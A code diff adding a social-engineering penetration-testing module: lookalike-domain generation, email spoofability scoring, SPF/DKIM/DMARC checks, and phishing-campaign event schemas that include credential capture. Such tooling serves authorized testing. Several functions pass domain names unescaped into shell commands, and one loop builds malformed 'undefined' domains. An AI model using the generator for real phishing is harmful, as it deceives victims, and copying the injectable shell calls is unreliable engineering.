+  // ========== Lookalike Domain Generation ==========
+
+  /**
+   * Lookalike domain result.
+   */
+  export interface LookalikeDomain {
+    domain: string
+    technique: string
+    similarity: number
+  }
+
+  /**
+   * Generate lookalike domains for a target.
+   */
+  export function generateLookalikes(domain: string): LookalikeDomain[] {
+    const lookalikes: LookalikeDomain[] = []
+    const baseName = domain.split(".")[0]
+    const tld = domain.split(".").slice(1).join(".")
+
+    // Homograph attacks (character substitution)
+    const homographs: Record<string, string[]> = {
+      a: ["а", "ä", "à", "á", "â"],
+      e: ["е", "ë", "è", "é", "ê"],
+      i: ["і", "ï", "ì", "í", "î", "1", "l"],
+      o: ["о", "ö", "ò", "ó", "ô", "0"],
+      u: ["υ", "ü", "ù", "ú", "û"],
+      l: ["1", "i", "I", "|"],
+      n: ["ń", "ñ"],
+      c: ["ć", "ç"],
+      s: ["ś", "ş"],
+      g: ["ğ"],
+      r: ["г"],
+      m: ["rn"],
+      w: ["vv"],
+    }
+
+    // Generate homograph variants
+    for (const [char, replacements] of Object.entries(homographs)) {
+      if (baseName.includes(char)) {
+        for (const replacement of replacements.slice(0, 2)) {
+          const newName = baseName.replace(char, replacement)
+          lookalikes.push({
+            domain: `${newName}.${tld}`,
+            technique: "homograph",
+            similarity: 0.95,
+          })
+        }
+      }
+    }
+
+    // Typosquatting - adjacent key typos
+    const keyboard = {
+      q: ["w", "a"],
+      w: ["q", "e", "s"],
+      e: ["w", "r", "d"],
+      r: ["e", "t", "f"],
+      t: ["r", "y", "g"],
+      y: ["t", "u", "h"],
+      u: ["y", "i", "j"],
+      i: ["u", "o", "k"],
+      o: ["i", "p", "l"],
+      p: ["o", "l"],
+      a: ["q", "s", "z"],
+      s: ["a", "d", "w", "x"],
+      d: ["s", "f", "e", "c"],
+      f: ["d", "g", "r", "v"],
+      g: ["f", "h", "t", "b"],
+      h: ["g", "j", "y", "n"],
+      j: ["h", "k", "u", "m"],
+      k: ["j", "l", "i"],
+      l: ["k", "o", "p"],
+      z: ["a", "x"],
+      x: ["z", "c", "s"],
+      c: ["x", "v", "d"],
+      v: ["c", "b", "f"],
+      b: ["v", "n", "g"],
+      n: ["b", "m", "h"],
+      m: ["n", "j"],
+    }
+
+    for (let i = 0; i < baseName.length; i++) {
+      const char = baseName[i].toLowerCase()
+      const adjacentKeys = keyboard[char as keyof typeof keyboard]
+      if (adjacentKeys) {
+        const typo = adjacentKeys[0]
+        const newName = baseName.slice(0, i) + typo + baseName.slice(i + 1)
+        lookalikes.push({
+          domain: `${newName}.${tld}`,
+          technique: "typosquatting",
+          similarity: 0.85,
+        })
+      }
+    }
+
+    // Character omission
+    for (let i = 0; i < baseName.length; i++) {
+      const newName = baseName.slice(0, i) + baseName.slice(i + 1)
+      if (newName.length >= 3) {
+        lookalikes.push({
+          domain: `${newName}.${tld}`,
+          technique: "omission",
+          similarity: 0.8,
+        })
+      }
+    }
+
+    // Character insertion
+    for (let i = 0; i <= baseName.length; i++) {
+      const newName = baseName.slice(0, i) + baseName[i - 1] + baseName.slice(i)
+      if (newName !== baseName) {
+        lookalikes.push({
+          domain: `${newName}.${tld}`,
+          technique: "insertion",
+          similarity: 0.8,
+        })
+      }
+    }
+
+    // Hyphenation variants
+    for (let i = 1; i < baseName.length; i++) {
+      const newName = baseName.slice(0, i) + "-" + baseName.slice(i)
+      lookalikes.push({
+        domain: `${newName}.${tld}`,
+        technique: "hyphenation",
+        similarity: 0.75,
+      })
+    }
+
+    // Common prefixes/suffixes
+    const affixes = [
+      "secure-",
+      "login-",
+      "mail-",
+      "my-",
+      "portal-",
+      "-secure",
+      "-login",
+      "-mail",
+      "-portal",
+      "-online",
+    ]
+    for (const affix of affixes) {
+      if (affix.startsWith("-")) {
+        lookalikes.push({
+          domain: `${baseName}${affix}.${tld}`,
+          technique: "suffix",
+          similarity: 0.7,
+        })
+      } else {
+        lookalikes.push({
+          domain: `${affix}${baseName}.${tld}`,
+          technique: "prefix",
+          similarity: 0.7,
+        })
+      }
+    }
+
+    // Different TLDs
+    const commonTlds = ["com", "net", "org", "co", "io", "info", "biz"]
+    for (const newTld of commonTlds) {
+      if (newTld !== tld && !tld.includes(newTld)) {
+        lookalikes.push({
+          domain: `${baseName}.${newTld}`,
+          technique: "tld-swap",
+          similarity: 0.9,
+        })
+      }
+    }
+
+    // Remove duplicates and sort by similarity
+    const unique = lookalikes.reduce(
+      (acc, curr) => {
+        if (!acc.find((l) => l.domain === curr.domain)) {
+          acc.push(curr)
+        }
+        return acc
+      },
+      [] as LookalikeDomain[]
+    )
+
+    return unique.sort((a, b) => b.similarity - a.similarity)
+  }
+
+  // ========== Spoof Assessment ==========
+
+  /**
+   * Spoof assessment result.
+   */
+  export interface SpoofAssessment {
+    domain: string
+    overallRisk: "low" | "medium" | "high" | "critical"
+    techniques: {
+      technique: string
+      feasible: boolean
+      difficulty: string
+      notes: string
+    }[]
+    lookalikeDomains: LookalikeDomain[]
+    recommendations: string[]
+  }
+
+  /**
+   * Assess spoofing vulnerability for a domain.
+   */
+  export async function assessSpoofVulnerability(
+    domain: string,
+    emailSecurity: SocEngTypes.EmailSecurityAssessment
+  ): Promise<SpoofAssessment> {
+    const techniques: SpoofAssessment["techniques"] = []
+
+    // Domain spoofing feasibility
+    const domainSpoofFeasible =
+      !emailSecurity.dmarc.exists ||
+      emailSecurity.dmarc.policy === "none" ||
+      !emailSecurity.spf.exists ||
+      emailSecurity.spf.allMechanism !== "-all"
+
+    techniques.push({
+      technique: "Domain Spoofing",
+      feasible: domainSpoofFeasible,
+      difficulty: domainSpoofFeasible ? "Easy" : "Very Difficult",
+      notes: domainSpoofFeasible
+        ? "Missing or weak email authentication"
+        : "Strong email authentication in place",
+    })
+
+    // Display name spoofing is always possible
+    techniques.push({
+      technique: "Display Name Spoofing",
+      feasible: true,
+      difficulty: "Trivial",
+      notes: "Always possible - relies on user vigilance",
+    })
+
+    // Lookalike domains
+    const lookalikes = generateLookalikes(domain).slice(0, 20)
+    techniques.push({
+      technique: "Lookalike Domain",
+      feasible: true,
+      difficulty: "Easy",
+      notes: `${lookalikes.length} potential lookalike domains identified`,
+    })
+
+    // Reply-To spoofing
+    techniques.push({
+      technique: "Reply-To Spoofing",
+      feasible: true,
+      difficulty: "Trivial",
+      notes: "Effectiveness depends on email client warnings",
+    })
+
+    // Calculate overall risk
+    let riskScore = 0
+    if (domainSpoofFeasible) riskScore += 40
+    if (!emailSecurity.spf.exists) riskScore += 15
+    if (!emailSecurity.dkim.exists) riskScore += 15
+    if (!emailSecurity.dmarc.exists) riskScore += 20
+    if (emailSecurity.dmarc.policy === "none") riskScore += 10
+
+    let overallRisk: SpoofAssessment["overallRisk"]
+    if (riskScore >= 70) overallRisk = "critical"
+    else if (riskScore >= 50) overallRisk = "high"
+    else if (riskScore >= 30) overallRisk = "medium"
+    else overallRisk = "low"
+
+    // Generate recommendations
+    const recommendations = [...emailSecurity.recommendations]
+    if (lookalikes.length > 0) {
+      recommendations.push("Consider registering common lookalike domains defensively")
+    }
+    recommendations.push("Implement email gateway rules to flag display name spoofing")
+    recommendations.push("Train users to verify sender addresses, not just display names")
+
+    return {
+      domain,
+      overallRisk,
+      techniques,
+      lookalikeDomains: lookalikes,
+      recommendations,
+    }
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format spoof assessment for display.
+   */
+  export function formatAssessment(assessment: SpoofAssessment): string {
+    const lines: string[] = []
+
+    lines.push(`Spoofing Vulnerability Assessment: ${assessment.domain}`)
+    lines.push("=".repeat(60))
+    lines.push("")
+    lines.push(`Overall Risk: ${assessment.overallRisk.toUpperCase()}`)
+    lines.push("")
+
+    lines.push("Spoofing Techniques:")
+    lines.push("-".repeat(40))
+    for (const tech of assessment.techniques) {
+      const status = tech.feasible ? "✓ Feasible" : "✗ Not Feasible"
+      lines.push(`${tech.technique}: ${status}`)
+      lines.push(`  Difficulty: ${tech.difficulty}`)
+      lines.push(`  ${tech.notes}`)
+      lines.push("")
+    }
+
+    if (assessment.lookalikeDomains.length > 0) {
+      lines.push("Top Lookalike Domains:")
+      lines.push("-".repeat(40))
+      for (const lookalike of assessment.lookalikeDomains.slice(0, 10)) {
+        lines.push(`  ${lookalike.domain} (${lookalike.technique}, ${Math.round(lookalike.similarity * 100)}% similar)`)
+      }
+      lines.push("")
+    }
+
+    if (assessment.recommendations.length > 0) {
+      lines.push("Recommendations:")
+      lines.push("-".repeat(40))
+      for (const rec of assessment.recommendations) {
+        lines.push(`  • ${rec}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/email/validation.ts b/packages/opencode/src/pentest/soceng/email/validation.ts
new file mode 100644
index 00000000000..16f5cbe1625
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/email/validation.ts
@@ -0,0 +1,478 @@
+/**
+ * @fileoverview Email Security Validation
+ *
+ * SPF, DKIM, and DMARC validation for email security assessment.
+ *
+ * @module pentest/soceng/email/validation
+ */
+
+import { SocEngTypes } from "../types"
+import { Bus } from "../../../bus"
+import { SocEngEvents } from "../events"
+
+/**
+ * Email validation namespace.
+ */
+export namespace EmailValidation {
+  // ========== SPF Validation ==========
+
+  /**
+   * Check SPF record for domain.
+   */
+  export async function checkSPF(
+    domain: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<SocEngTypes.SPFResult> {
+    const result: SocEngTypes.SPFResult = {
+      exists: false,
+      valid: false,
+      mechanisms: [],
+      includes: [],
+      issues: [],
+    }
+
+    try {
+      // Query TXT records for SPF
+      const dnsResult = await execCommand(`dig +short TXT ${domain} 2>/dev/null || host -t TXT ${domain} 2>/dev/null`)
+
+      const spfRecord = dnsResult.stdout
+        .split("\n")
+        .find((line) => line.includes("v=spf1"))
+
+      if (spfRecord) {
+        result.exists = true
+        result.record = spfRecord.replace(/"/g, "").trim()
+        result.valid = true
+
+        // Parse mechanisms
+        const parts = result.record.split(" ")
+        for (const part of parts) {
+          if (part.startsWith("include:")) {
+            result.includes.push(part.replace("include:", ""))
+          } else if (part.startsWith("+") || part.startsWith("-") || part.startsWith("~") || part.startsWith("?")) {
+            result.mechanisms.push(part)
+          } else if (["all", "-all", "~all", "+all", "?all"].includes(part)) {
+            result.allMechanism = part
+          } else if (part !== "v=spf1") {
+            result.mechanisms.push(part)
+          }
+        }
+
+        // Check for issues
+        if (result.allMechanism === "+all") {
+          result.issues.push("SPF uses +all which allows any sender")
+        } else if (result.allMechanism === "?all") {
+          result.issues.push("SPF uses ?all (neutral) which provides no protection")
+        } else if (!result.allMechanism) {
+          result.issues.push("SPF record missing 'all' mechanism")
+        }
+
+        if (result.includes.length > 10) {
+          result.issues.push("SPF has too many includes (DNS lookup limit)")
+        }
+      } else {
+        result.issues.push("No SPF record found")
+      }
+    } catch (error) {
+      result.issues.push(`SPF check failed: ${error}`)
+    }
+
+    return result
+  }
+
+  // ========== DKIM Validation ==========
+
+  /**
+   * Common DKIM selectors to check.
+   */
+  const COMMON_DKIM_SELECTORS = [
+    "default",
+    "google",
+    "selector1",
+    "selector2",
+    "k1",
+    "k2",
+    "mail",
+    "dkim",
+    "s1",
+    "s2",
+    "smtp",
+    "mandrill",
+    "mailchimp",
+    "amazonses",
+  ]
+
+  /**
+   * Check DKIM records for domain.
+   */
+  export async function checkDKIM(
+    domain: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>,
+    selectors?: string[]
+  ): Promise<SocEngTypes.DKIMResult> {
+    const result: SocEngTypes.DKIMResult = {
+      exists: false,
+      selectors: [],
+      issues: [],
+    }
+
+    const selectorsToCheck = selectors || COMMON_DKIM_SELECTORS
+
+    for (const selector of selectorsToCheck) {
+      try {
+        const dnsResult = await execCommand(
+          `dig +short TXT ${selector}._domainkey.${domain} 2>/dev/null || host -t TXT ${selector}._domainkey.${domain} 2>/dev/null`
+        )
+
+        if (dnsResult.stdout && dnsResult.stdout.includes("v=DKIM1")) {
+          result.exists = true
+          const record = dnsResult.stdout.replace(/"/g, "").trim()
+
+          const selectorResult: SocEngTypes.DKIMResult["selectors"][0] = {
+            selector,
+            record,
+            valid: true,
+          }
+
+          // Parse key type and size
+          const keyTypeMatch = record.match(/k=([^;]+)/)
+          if (keyTypeMatch) {
+            selectorResult.keyType = keyTypeMatch[1]
+          }
+
+          // Check for weak key
+          const pMatch = record.match(/p=([^;]+)/)
+          if (pMatch) {
+            const keyLength = pMatch[1].length * 6 // Approximate bits from base64
+            selectorResult.keySize = keyLength
+
+            if (keyLength < 1024) {
+              result.issues.push(`DKIM key for ${selector} is weak (< 1024 bits)`)
+            }
+          }
+
+          result.selectors.push(selectorResult)
+        }
+      } catch {
+        // Selector not found, continue
+      }
+    }
+
+    if (!result.exists) {
+      result.issues.push("No DKIM records found for common selectors")
+    }
+
+    return result
+  }
+
+  // ========== DMARC Validation ==========
+
+  /**
+   * Check DMARC record for domain.
+   */
+  export async function checkDMARC(
+    domain: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<SocEngTypes.DMARCResult> {
+    const result: SocEngTypes.DMARCResult = {
+      exists: false,
+      valid: false,
+      reportingUris: [],
+      issues: [],
+    }
+
+    try {
+      const dnsResult = await execCommand(
+        `dig +short TXT _dmarc.${domain} 2>/dev/null || host -t TXT _dmarc.${domain} 2>/dev/null`
+      )
+
+      const dmarcRecord = dnsResult.stdout
+        .split("\n")
+        .find((line) => line.includes("v=DMARC1"))
+
+      if (dmarcRecord) {
+        result.exists = true
+        result.record = dmarcRecord.replace(/"/g, "").trim()
+        result.valid = true
+
+        // Parse DMARC tags
+        const tags = result.record.split(";").map((t) => t.trim())
+
+        for (const tag of tags) {
+          const [key, value] = tag.split("=").map((s) => s.trim())
+
+          switch (key) {
+            case "p":
+              result.policy = value
+              break
+            case "sp":
+              result.subdomainPolicy = value
+              break
+            case "pct":
+              result.percentage = parseInt(value, 10)
+              break
+            case "rua":
+              result.reportingUris.push(...value.split(",").map((u) => u.trim()))
+              break
+            case "ruf":
+              result.reportingUris.push(...value.split(",").map((u) => u.trim()))
+              break
+          }
+        }
+
+        // Check for issues
+        if (result.policy === "none") {
+          result.issues.push("DMARC policy is 'none' - no enforcement")
+        }
+
+        if (result.percentage && result.percentage < 100) {
+          result.issues.push(`DMARC only applies to ${result.percentage}% of messages`)
+        }
+
+        if (!result.subdomainPolicy) {
+          result.issues.push("No subdomain policy specified")
+        }
+
+        if (result.reportingUris.length === 0) {
+          result.issues.push("No reporting URIs configured")
+        }
+      } else {
+        result.issues.push("No DMARC record found")
+      }
+    } catch (error) {
+      result.issues.push(`DMARC check failed: ${error}`)
+    }
+
+    return result
+  }
+
+  // ========== Full Assessment ==========
+
+  /**
+   * Perform full email security assessment.
+   */
+  export async function assessEmailSecurity(
+    domain: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<SocEngTypes.EmailSecurityAssessment> {
+    // Run all checks in parallel
+    const [spf, dkim, dmarc, mx] = await Promise.all([
+      checkSPF(domain, execCommand),
+      checkDKIM(domain, execCommand),
+      checkDMARC(domain, execCommand),
+      getMXRecords(domain, execCommand),
+    ])
+
+    // Determine spoofability
+    const { spoofable, difficulty } = assessSpoofability(spf, dkim, dmarc)
+
+    // Generate recommendations
+    const recommendations = generateRecommendations(spf, dkim, dmarc)
+
+    const assessment: SocEngTypes.EmailSecurityAssessment = {
+      domain,
+      spf,
+      dkim,
+      dmarc,
+      mxRecords: mx,
+      spoofable,
+      spoofDifficulty: difficulty,
+      recommendations,
+      timestamp: Date.now(),
+    }
+
+    // Emit event
+    Bus.publish(SocEngEvents.EmailSecurityChecked, {
+      domain,
+      spoofable,
+      spfExists: spf.exists,
+      dkimExists: dkim.exists,
+      dmarcExists: dmarc.exists,
+    })
+
+    return assessment
+  }
+
+  /**
+   * Get MX records for domain.
+   */
+  async function getMXRecords(
+    domain: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<string[]> {
+    try {
+      const result = await execCommand(`dig +short MX ${domain} 2>/dev/null || host -t MX ${domain} 2>/dev/null`)
+      return result.stdout
+        .split("\n")
+        .filter((line) => line.trim())
+        .map((line) => line.replace(/^\d+\s+/, "").trim())
+    } catch {
+      return []
+    }
+  }
+
+  /**
+   * Assess spoofability based on email security checks.
+   */
+  function assessSpoofability(
+    spf: SocEngTypes.SPFResult,
+    dkim: SocEngTypes.DKIMResult,
+    dmarc: SocEngTypes.DMARCResult
+  ): {
+    spoofable: boolean
+    difficulty: SocEngTypes.EmailSecurityAssessment["spoofDifficulty"]
+  } {
+    // Calculate score (higher = more secure)
+    let score = 0
+
+    // SPF scoring
+    if (spf.exists) {
+      score += 1
+      if (spf.allMechanism === "-all") score += 2
+      else if (spf.allMechanism === "~all") score += 1
+    }
+
+    // DKIM scoring
+    if (dkim.exists) {
+      score += 2
+      if (dkim.selectors.some((s) => (s.keySize || 0) >= 2048)) score += 1
+    }
+
+    // DMARC scoring
+    if (dmarc.exists) {
+      score += 1
+      if (dmarc.policy === "reject") score += 3
+      else if (dmarc.policy === "quarantine") score += 2
+    }
+
+    // Determine difficulty
+    let difficulty: SocEngTypes.EmailSecurityAssessment["spoofDifficulty"]
+    if (score <= 1) difficulty = "trivial"
+    else if (score <= 3) difficulty = "easy"
+    else if (score <= 5) difficulty = "moderate"
+    else if (score <= 7) difficulty = "difficult"
+    else difficulty = "very_difficult"
+
+    return {
+      spoofable: score < 6,
+      difficulty,
+    }
+  }
+
+  /**
+   * Generate security recommendations.
+   */
+  function generateRecommendations(
+    spf: SocEngTypes.SPFResult,
+    dkim: SocEngTypes.DKIMResult,
+    dmarc: SocEngTypes.DMARCResult
+  ): string[] {
+    const recommendations: string[] = []
+
+    // SPF recommendations
+    if (!spf.exists) {
+      recommendations.push("Implement SPF record to specify authorized mail servers")
+    } else if (spf.allMechanism !== "-all") {
+      recommendations.push("Change SPF to use '-all' (hard fail) instead of '~all' (soft fail)")
+    }
+
+    // DKIM recommendations
+    if (!dkim.exists) {
+      recommendations.push("Implement DKIM signing for outgoing emails")
+    } else {
+      const weakKeys = dkim.selectors.filter((s) => (s.keySize || 0) < 2048)
+      if (weakKeys.length > 0) {
+        recommendations.push("Upgrade DKIM keys to at least 2048 bits")
+      }
+    }
+
+    // DMARC recommendations
+    if (!dmarc.exists) {
+      recommendations.push("Implement DMARC policy to protect against spoofing")
+    } else {
+      if (dmarc.policy === "none") {
+        recommendations.push("Change DMARC policy from 'none' to 'quarantine' or 'reject'")
+      } else if (dmarc.policy === "quarantine") {
+        recommendations.push("Consider upgrading DMARC policy to 'reject' for maximum protection")
+      }
+      if (dmarc.percentage && dmarc.percentage < 100) {
+        recommendations.push("Increase DMARC percentage to 100%")
+      }
+    }
+
+    return recommendations
+  }
+
+  // ========== Quick Checks ==========
+
+  /**
+   * Quick check if domain is spoofable.
+   */
+  export async function isDomainspoofable(
+    domain: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<boolean> {
+    const assessment = await assessEmailSecurity(domain, execCommand)
+    return assessment.spoofable
+  }
+
+  /**
+   * Get spoofability summary.
+   */
+  export function formatAssessment(
+    assessment: SocEngTypes.EmailSecurityAssessment
+  ): string {
+    const lines: string[] = []
+
+    lines.push(`Email Security Assessment: ${assessment.domain}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    // SPF
+    lines.push(`SPF: ${assessment.spf.exists ? "✓ Found" : "✗ Not Found"}`)
+    if (assessment.spf.record) {
+      lines.push(`  Record: ${assessment.spf.record.slice(0, 60)}...`)
+    }
+    if (assessment.spf.issues.length > 0) {
+      lines.push(`  Issues: ${assessment.spf.issues.join(", ")}`)
+    }
+
+    // DKIM
+    lines.push("")
+    lines.push(`DKIM: ${assessment.dkim.exists ? "✓ Found" : "✗ Not Found"}`)
+    if (assessment.dkim.selectors.length > 0) {
+      lines.push(`  Selectors: ${assessment.dkim.selectors.map((s) => s.selector).join(", ")}`)
+    }
+    if (assessment.dkim.issues.length > 0) {
+      lines.push(`  Issues: ${assessment.dkim.issues.join(", ")}`)
+    }
+
+    // DMARC
+    lines.push("")
+    lines.push(`DMARC: ${assessment.dmarc.exists ? "✓ Found" : "✗ Not Found"}`)
+    if (assessment.dmarc.policy) {
+      lines.push(`  Policy: ${assessment.dmarc.policy}`)
+    }
+    if (assessment.dmarc.issues.length > 0) {
+      lines.push(`  Issues: ${assessment.dmarc.issues.join(", ")}`)
+    }
+
+    // Summary
+    lines.push("")
+    lines.push("Summary")
+    lines.push("-".repeat(30))
+    lines.push(`Spoofable: ${assessment.spoofable ? "YES" : "NO"}`)
+    lines.push(`Difficulty: ${assessment.spoofDifficulty}`)
+
+    // Recommendations
+    if (assessment.recommendations.length > 0) {
+      lines.push("")
+      lines.push("Recommendations:")
+      for (const rec of assessment.recommendations) {
+        lines.push(`  • ${rec}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/events.ts b/packages/opencode/src/pentest/soceng/events.ts
new file mode 100644
index 00000000000..5c3db970720
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/events.ts
@@ -0,0 +1,375 @@
+/**
+ * @fileoverview Social Engineering Events
+ *
+ * Event definitions for social engineering toolkit.
+ *
+ * @module pentest/soceng/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+import { SocEngTypes } from "./types"
+
+/**
+ * Social engineering events namespace.
+ */
+export namespace SocEngEvents {
+  // ========== Campaign Events ==========
+
+  /**
+   * Campaign created event.
+   */
+  export const CampaignCreated = BusEvent.define(
+    "soceng.campaign_created",
+    z.object({
+      campaignId: z.string(),
+      name: z.string(),
+      type: SocEngTypes.CampaignTypeSchema,
+      targetCount: z.number(),
+    })
+  )
+
+  /**
+   * Campaign started event.
+   */
+  export const CampaignStarted = BusEvent.define(
+    "soceng.campaign_started",
+    z.object({
+      campaignId: z.string(),
+      targetCount: z.number(),
+      scheduledEnd: z.number().optional(),
+    })
+  )
+
+  /**
+   * Campaign paused event.
+   */
+  export const CampaignPaused = BusEvent.define(
+    "soceng.campaign_paused",
+    z.object({
+      campaignId: z.string(),
+      reason: z.string().optional(),
+    })
+  )
+
+  /**
+   * Campaign resumed event.
+   */
+  export const CampaignResumed = BusEvent.define(
+    "soceng.campaign_resumed",
+    z.object({
+      campaignId: z.string(),
+    })
+  )
+
+  /**
+   * Campaign completed event.
+   */
+  export const CampaignCompleted = BusEvent.define(
+    "soceng.campaign_completed",
+    z.object({
+      campaignId: z.string(),
+      results: SocEngTypes.EmbeddedResultsSchema.optional(),
+      duration: z.number().optional(),
+    })
+  )
+
+  /**
+   * Campaign cancelled event.
+   */
+  export const CampaignCancelled = BusEvent.define(
+    "soceng.campaign_cancelled",
+    z.object({
+      campaignId: z.string(),
+      reason: z.string().optional(),
+    })
+  )
+
+  // ========== Email Events ==========
+
+  /**
+   * Email sent event.
+   */
+  export const EmailSent = BusEvent.define(
+    "soceng.email_sent",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      email: z.string(),
+      messageId: z.string().optional(),
+    })
+  )
+
+  /**
+   * Email delivered event.
+   */
+  export const EmailDelivered = BusEvent.define(
+    "soceng.email_delivered",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      email: z.string(),
+    })
+  )
+
+  /**
+   * Email bounced event.
+   */
+  export const EmailBounced = BusEvent.define(
+    "soceng.email_bounced",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      email: z.string(),
+      reason: z.string(),
+    })
+  )
+
+  /**
+   * Email opened event.
+   */
+  export const EmailOpened = BusEvent.define(
+    "soceng.email_opened",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      timestamp: z.number(),
+      ipAddress: z.string().optional(),
+      userAgent: z.string().optional(),
+    })
+  )
+
+  // ========== Tracking Events ==========
+
+  /**
+   * Link clicked event.
+   */
+  export const LinkClicked = BusEvent.define(
+    "soceng.link_clicked",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      url: z.string(),
+      timestamp: z.number(),
+      ipAddress: z.string().optional(),
+      userAgent: z.string().optional(),
+    })
+  )
+
+  /**
+   * Attachment opened event.
+   */
+  export const AttachmentOpened = BusEvent.define(
+    "soceng.attachment_opened",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      filename: z.string(),
+      timestamp: z.number(),
+    })
+  )
+
+  /**
+   * Credential captured event (hashed).
+   */
+  export const CredentialCaptured = BusEvent.define(
+    "soceng.credential_captured",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      fields: z.array(z.string()), // Field names only, not values
+      timestamp: z.number(),
+    })
+  )
+
+  /**
+   * Form submitted event.
+   */
+  export const FormSubmitted = BusEvent.define(
+    "soceng.form_submitted",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      fields: z.array(z.string()),
+      timestamp: z.number(),
+    })
+  )
+
+  /**
+   * Payload executed event.
+   */
+  export const PayloadExecuted = BusEvent.define(
+    "soceng.payload_executed",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      payloadId: z.string(),
+      payloadType: SocEngTypes.PayloadTypeSchema,
+      timestamp: z.number(),
+      hostname: z.string().optional(),
+      username: z.string().optional(),
+    })
+  )
+
+  // ========== Awareness Events ==========
+
+  /**
+   * Reported as phish event.
+   */
+  export const ReportedPhish = BusEvent.define(
+    "soceng.reported_phish",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      timestamp: z.number(),
+      reportMethod: z.string().optional(),
+    })
+  )
+
+  /**
+   * Training completed event.
+   */
+  export const TrainingCompleted = BusEvent.define(
+    "soceng.training_completed",
+    z.object({
+      campaignId: z.string(),
+      targetId: z.string(),
+      trainingModule: z.string(),
+      score: z.number().optional(),
+      timestamp: z.number(),
+    })
+  )
+
+  // ========== OSINT Events ==========
+
+  /**
+   * Recon started event.
+   */
+  export const ReconStarted = BusEvent.define(
+    "soceng.recon_started",
+    z.object({
+      reconId: z.string(),
+      target: z.string(),
+      targetType: z.string(),
+      modules: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Recon completed event.
+   */
+  export const ReconCompleted = BusEvent.define(
+    "soceng.recon_completed",
+    z.object({
+      reconId: z.string(),
+      target: z.string(),
+      emailsFound: z.number(),
+      employeesFound: z.number(),
+      profilesFound: z.number(),
+      duration: z.number(),
+    })
+  )
+
+  /**
+   * Email harvested event.
+   */
+  export const EmailHarvested = BusEvent.define(
+    "soceng.email_harvested",
+    z.object({
+      reconId: z.string(),
+      email: z.string(),
+      source: z.string(),
+    })
+  )
+
+  // ========== Template Events ==========
+
+  /**
+   * Template created event.
+   */
+  export const TemplateCreated = BusEvent.define(
+    "soceng.template_created",
+    z.object({
+      templateId: z.string(),
+      name: z.string(),
+      category: z.string(),
+    })
+  )
+
+  /**
+   * Landing page created event.
+   */
+  export const LandingPageCreated = BusEvent.define(
+    "soceng.landing_page_created",
+    z.object({
+      pageId: z.string(),
+      name: z.string(),
+      type: SocEngTypes.LandingPageTypeSchema,
+    })
+  )
+
+  // ========== Security Events ==========
+
+  /**
+   * Email security checked event.
+   */
+  export const EmailSecurityChecked = BusEvent.define(
+    "soceng.email_security_checked",
+    z.object({
+      domain: z.string(),
+      spoofable: z.boolean(),
+      spfExists: z.boolean(),
+      dkimExists: z.boolean(),
+      dmarcExists: z.boolean(),
+    })
+  )
+
+  /**
+   * Pretext scenario generated event.
+   */
+  export const PretextGenerated = BusEvent.define(
+    "soceng.pretext_generated",
+    z.object({
+      scenarioId: z.string(),
+      category: SocEngTypes.PretextCategorySchema,
+      targetInfo: z.string().optional(),
+    })
+  )
+
+  /**
+   * Payload created event.
+   */
+  export const PayloadCreated = BusEvent.define(
+    "soceng.payload_created",
+    z.object({
+      payloadId: z.string(),
+      type: SocEngTypes.PayloadTypeSchema,
+      obfuscated: z.boolean(),
+    })
+  )
+
+  // ========== Session Events ==========
+
+  /**
+   * Session started event.
+   */
+  export const SessionStarted = BusEvent.define(
+    "soceng.session_started",
+    z.object({
+      sessionId: z.string(),
+      type: z.string(),
+      targetDomain: z.string().optional(),
+    })
+  )
+
+  /**
+   * Session ended event.
+   */
+  export const SessionEnded = BusEvent.define(
+    "soceng.session_ended",
+    z.object({
+      sessionId: z.string(),
+      duration: z.number(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/soceng/index.ts b/packages/opencode/src/pentest/soceng/index.ts
new file mode 100644
index 00000000000..16dafbf06ec
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/index.ts
@@ -0,0 +1,58 @@
+/**
+ * @fileoverview Social Engineering Toolkit
+ *
+ * Comprehensive social engineering toolkit for authorized security testing,
+ * red team engagements, and security awareness training.
+ *
+ * ## IMPORTANT DISCLAIMER
+ *
+ * This module is intended for AUTHORIZED security testing ONLY.
+ * Unauthorized use of these tools against systems or individuals
+ * without explicit permission is illegal and unethical.
+ *
+ * Always ensure:
+ * - Written authorization from system owners
+ * - Compliance with applicable laws and regulations
+ * - Proper scoping and rules of engagement
+ * - Ethical handling of captured data
+ *
+ * ## Features
+ *
+ * - **Phishing Campaigns**: Email-based security awareness testing
+ * - **Credential Harvesting**: Fake login page deployment
+ * - **Pretexting**: Social engineering scenario generation
+ * - **Payload Generation**: Test payload creation
+ * - **OSINT Reconnaissance**: Open source intelligence gathering
+ * - **Email Security**: SPF/DKIM/DMARC validation
+ * - **Awareness Training**: Integration with training platforms
+ *
+ * @module pentest/soceng
+ */
+
+// Core exports
+export { SocEngTypes } from "./types"
